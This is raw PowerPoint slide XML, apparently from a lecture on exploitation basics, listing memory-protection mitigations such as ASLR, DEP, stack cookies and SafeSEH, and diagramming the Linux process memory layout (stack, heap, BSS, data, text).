              <a:rPr lang="en"/>
              <a:t>ASLR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DEP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stack Cookies </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(/GS Protection)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Safe SEH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And how to get around them</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="662" name="Shape 662"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4093138" y="2899429"/>
            <a:ext cx="4593662" cy="3645459"/>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Shape 667"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2266576"/>
            <a:ext cx="6400800" cy="1333800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Shape 668"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3600451"/>
            <a:ext cx="6400800" cy="900600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </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2" name="Shape 672"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="673" name="Shape 673"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Linux process memory layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="674" name="Shape 674"/>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lang="en"/>
              <a:t>Program scratch space </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>local (scoped) variables, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>environment variables,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>passed arguments,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>return instruction pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>dynamic space             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	malloc(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	new(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uninitialized global &amp; static vars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>named BSS by old convention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Initialized global &amp; static variables </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a:t>machine instructions / code segments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="675" name="Shape 675"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4722769" y="1757700"/>
            <a:ext cx="2050200" cy="4770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rPr lang="en"/>
              <a:t>RESERVED SPACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>STACK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RESERVED SPACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HEAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEXT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Shape 676"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6841550" y="1767950"/>
            <a:ext cx="1494300" cy="416700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="677" name="Shape 677"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810075" y="1775825"/>
            <a:ext cx="1793100" cy="393300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xFFFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="678" name="Shape 678"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810075" y="6195425"/>
            <a:ext cx="1793100" cy="393300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="679" name="Shape 679"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3027175" y="1972425"/>
            <a:ext cx="1714500" cy="534900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="680" name="Shape 680"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="675" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125069" y="3600450"/>
            <a:ext cx="2597700" cy="542700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="681" name="Shape 681"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="3797900" y="4567850"/>
            <a:ext cx="904500" cy="117900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="682" name="Shape 682"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4049575" y="5236275"/>
            <a:ext cx="645000" cy="102300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="683" name="Shape 683"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4490000" y="6353050"/>
            <a:ext cx="235800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="684" name="Shape 684"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5598925" y="2648800"/>
            <a:ext cx="0" cy="424800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="685" name="Shape 685"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751325" y="2648800"/>
            <a:ext cx="0" cy="424800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="686" name="Shape 686"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5903725" y="2648800"/>
            <a:ext cx="0" cy="424800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="687" name="Shape 687"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5606800" y="3687025"/>
            <a:ext cx="0" cy="377400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="688" name="Shape 688"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5759200" y="3687025"/>
            <a:ext cx="0" cy="377400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="689" name="Shape 689"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5911600" y="3687025"/>
            <a:ext cx="0" cy="3774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3" name="Shape 693"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="694" name="Shape 694"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Alternate view for linux process memory layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="695" name="Shape 695"/>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lang="en"/>
              <a:t>machine instructions / code segments-&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Initialized global &amp; static variables ----&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Uninitialized global &amp; static vars ------&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>dynamic space             -----------------&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	malloc(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	new(...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
